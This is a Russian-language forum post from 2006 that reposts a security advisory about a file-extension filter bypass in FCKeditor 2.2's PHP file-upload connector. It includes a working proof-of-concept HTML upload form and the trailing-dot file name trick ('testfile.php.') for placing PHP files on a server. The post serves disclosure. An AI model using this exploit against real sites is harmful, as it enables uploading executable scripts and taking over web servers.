27.02.2006, 13:50
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
Уязвимость в FCKeditor 2.2
Что-то новость прошла незамеченной...
Исследование: NSA Group
Продукт: FCKeditor 2.2
Сайт производителя: http://www.fckeditor.net
Описание:
Возможен обход фильтрации расширений файлов.
Воздействие:
Загрузка запрещённых файлов на целевую систему.
Риск: высокий
Пример:
Код:
<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload:
<input id="txtFileUpload" type="file" name="NewFile">
<input type="submit" value="Upload">
</form>
В конце имени загружаемого файла поставеть символ "." (пример: testfile.php.)
В результате на сервере будет создан файл testfile.php
Решение:
Обратиться на сайт производителя http://www.fckeditor.net
---
Источник: http://www.nsag.ru/vuln/893.html
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|